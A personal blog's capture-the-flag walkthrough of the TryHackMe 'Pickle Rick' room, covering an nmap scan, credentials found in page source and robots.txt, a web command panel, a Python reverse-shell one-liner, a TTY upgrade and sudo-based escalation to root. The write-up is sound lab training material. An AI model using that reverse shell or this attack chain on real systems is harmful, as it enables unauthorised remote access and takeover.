Vernilo hacks stuff
  • Home
  • 📦Hack The Box Write-ups
    • 📋Challenges
      • 🟢Reversing: Baby RE
      • 🟢Crypto: Templed
      • 🟢Crypto : Bank Heist
      • 🟢Web: emdee five for life
      • 🟠Web: Freelancer
    • 🖥️Machines
      • 🟢Spectra
      • 🟢Blunder
      • 🟢Cap
      • 🟢Knife
      • 🟠The Notebook
  • 🌧️Try Hack Me Write-ups
    • 🟢RootME
    • 🟢Pickle Rick
    • 🟢Ignite
    • 🟢Bounty Hacker
    • 🟠Dogcat
  • 📝Blog Posts
    • 🔗Understanding potential vulnerabilities in authentication mechanisms
Powered by GitBook
On this page
  • Pickle Rick
  • A Rick and Morty CTF. Help turn Rick back into a human!
  • Pickle Rick is a Rick and Morty themed tryhackme room where we exploit a webserver to find 3 ingredients or flags.
  • Questions :
  • Enumeration
  • NMAP
  • Site
  • Source Code
  • find out interesting directories and files
  • Login
  • RCE
  • Reverse Shell
  • answering the first question
  • walking to the second question
  • answering the second question
  • walking to root
  • Root flag (3rd question)

Was this helpful?

  1. Try Hack Me Write-ups

Pickle Rick

PreviousRootMENextIgnite

Last updated 3 years ago

Was this helpful?

A Rick and Morty CTF. Help turn Rick back into a human!

Pickle Rick is a Rick and Morty themed tryhackme room where we exploit a webserver to find 3 ingredients or flags.

Questions :

  1. What is the first ingredient Rick needs?

  2. What's the second ingredient Rick needs?

  3. What's the final ingredient Rick needs?

Enumeration

NMAP

nmap -sS -sC -sV -A -O -vv BOX_IP

output

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 08:16:72:a6:42:80:aa:21:3f:9e:2a:76:4c:bc:45:0d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDibc1nVIGXaLx8nF5hflDtQi7KVayIQjoV/97QvFHpe67phA9ozRb+o0Azrp3UBxc6zlGDJiPRPdgXZUL53Zygvip9Tj/8GYucBA1yzcN5gtWfR7cVG/vZo/ToDD2bTiVbMy1fW7zWa9Le9VEytFnsBFOk0ePEn5rI7wLuZ+HHaVTJegtq6KIVw9eQUCxTqfjEvFxCyJMSbwPXWdURGwVYOW3VVpU8awDkklUZRQ/ElsKGJLLF+CjtQ3/+aT9VeWKIP8n/k+ymFL0zvkygEGdMaUOFBiaZd8FAAiBAbHXNGg2Scsnmid8V9sXS0tyN4OuItZ7Xc26eKmlsCzDkJlJJ
|   256 38:e1:90:b4:69:a0:49:f8:1d:cb:d5:1a:79:22:a2:b1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGo31VvNkXrpUtTcaSzV68TxybntTXNKXfLV7uueau4r5ROiko7CqYXSBBbcKovi06b+fPCIxdnu84ZHNrMK41Q=
|   256 a0:48:4b:8f:87:64:67:ca:d3:d3:61:3a:b2:80:f3:8e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlvtA3D1u0/IPcguHsofaDoMS4J2/VyFUsc5Ko+hKtM
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool

we have two open ports, 20 (ssh) and 80 (apache2 httpd)

Site

Source Code

Username: R1ckRul3s

find out interesting directories and files

robots.txt

(a string like a password???)

Login

trying to login with User:R1ckRul3s and Password:Wubbalubbadubdub in /login.php

Success

RCE

on this panel, we were able to execute commands on the system

then let's try a reverse shell from that

for this we will use python, so we have to know where it is (and if it exists)

all right, let's run the reverse shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

(changing the ip address for my thm-vpn IP)

Reverse Shell

Shell to TTY

python3 -c "import pty; pty.spawn('/bin/bash')"

answering the first question

cat Sup3rS3cretPickl3Ingred.txt

walking to the second question

answering the second question

walking to root

looking at the commands that the user can run

sudo -l

EASY!!!!!

We can run ANY command as root without password :O

Root flag (3rd question)

🌧️
🟢
Pickle Rick
image
image
image
image